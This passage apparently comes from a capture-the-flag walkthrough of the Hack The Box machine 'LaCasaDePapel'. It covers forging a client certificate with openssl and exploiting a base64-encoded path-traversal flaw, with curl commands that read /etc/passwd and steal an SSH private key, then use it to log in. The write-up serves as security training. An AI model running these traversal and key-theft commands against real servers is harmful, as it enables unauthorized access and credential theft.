3 :80 > :443
Using https://stackoverflow.com/questions/10175812/how-to-generate-a-self-signed-ssl-certificate-using-openssl
# METHOD 1 - Directly generate .pem and then .p12
$ openssl req -x509 -new -nodes -key ca.key -sha256 -out cert.pem -days 365 -subj '/CN=lacasadepapel.htb'
$ openssl pkcs12 -export -in cert.pem -inkey ca.key -out kashz.p12
# METHORD 2 - Generate .csr and use that to sign ca.key and generate .pem and then .p12
$ openssl req -new -key ca.key -out server.csr
# Common Name (e.g. server FQDN or YOUR name) []:lacasadepapel.htb
openssl x509 -req -days 365 -in server.csr -signkey ca.key -out server.crt
openssl pkcs12 -export -in server.crt -inkey ca.key -out kashz.p12
# import the .p12 access :443
# can access https://lacasadepapel.htb/
PRIVATE AREA
SEASON-1
SEASON-2
Select a season
https://lacasadepapel.htb/?path=SEASON-1
# its has .avi files for each episode but all empty.
# trying out directory traversal works
https://lacasadepapel.htb/?path=../
# trying to download a file fails
Error: ENOTDIR: not a directory, scandir '/home/berlin/downloads/../.ssh/id_rsa/'
# Trying to get SEASON-1/01.avi - > looking in Burp,
GET /file/U0VBU09OLTEvMDEuYXZp HTTP/1.1
$ echo "U0VBU09OLTEvMDEuYXZp" | base64 -d
SEASON-1/01.avi
$ curl -k https://lacasadepapel.htb/file/$(echo -n "../../../etc/passwd" | base64)
root:x:0:0:root:/root:/bin/ash
[truncated]
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
# we are in berlin's directory as per the error
# checking the .ssh directory and downloading contents
$ curl -k https://lacasadepapel.htb/file/$(echo -n "../.ssh/id_rsa" | base64) -o berlin_id_rsa
$ curl -k https://lacasadepapel.htb/file/$(echo -n "../.ssh/authorized_keys" | base64) -o berlin_authorized_keys
$ curl -k https://lacasadepapel.htb/file/$(echo -n "../.ssh/id_rsa.pub" | base64) -o berlin_id_rsa.pub
$ cat berlin_authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw== thek@ThekMac.local
$ cat berlin_id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCi0fpiC6mLsmGN1sNeGDZ/3GbPFoM13HESKgCAfYaNR5Rzhwl5N9T/JaDW/LHV1epqd/ADNg5AtSA73+sNsj3LnWtNCcuEeyn+IWIZ28M7mJnAs2vCbNUvGAZz6Y1pzerEdy4fHur7NAcHw19T+rPIAvb/GxGTME4NGDbW2xWqdNXzdPwIVIFQ7aPOK0cU2O9htpw/4mf1DljYdF0TTcNacAknvOThJZaJwzeuK65jJ6pXo5gpugfCL4UH3hjHXFo8UY/tPSOcFTeaiVRGEoqiU2pjvw8TmpimU7947kf/u8pusXsnlW2xWm8ZCyaOpSFAr8ahisy50iFx9BIxSemBZdi0KcikFrndpj9+XRdikv1rVlCHWIabiiV5Wdk2+oxriZv7yQLyTdYObD2mr9bd4ZVDpd7KP/iRQQ17VDzGP0EhctknBdge0AItLg9oplJFoVKORz/br9Pb3nx/agGokt/6jGLJ2BxMja8Lfg5jDBLtw5xKxLgeK9QLorugkkfDedQ2gDaB7dzCI7ps0esQowlY6symn1Qf0FtD+7uTkCntAXzIF+t0LrgQBTPJkldZ17U2FI2OIjSsGrMI9lAZI4sQgUDDNTRswi4m7gkhA4Af7e1+iHxxxR01yZ8fstpPukXdVjDKg8yjAukDx8bgVcbK+jKt95NcLoZjT7U1VQ== berlin@lacasadepapel.htb
# id_rsa.pub and authorized_keys DO NOT MATCH?
# trying ssh
# for user in berlin oslo nairobi professor dali ; do ssh -oBatchMode=yes -i ~/id_rsa_lacasadepapel_berlin $user@10.10.10.131; done
$ ssh -i berlin_id_rsa professor@10.10.10.131
_ ____ ____ ____ _
| | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| |
| | / _` | | | / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ |
| |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ |
|_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_|
|_|
lacasadepapel [~]$ whoami;id;hostname
professor
uid=1002(professor) gid=1002(professor) groups=1002(professor)
lacasadepapel
Last updated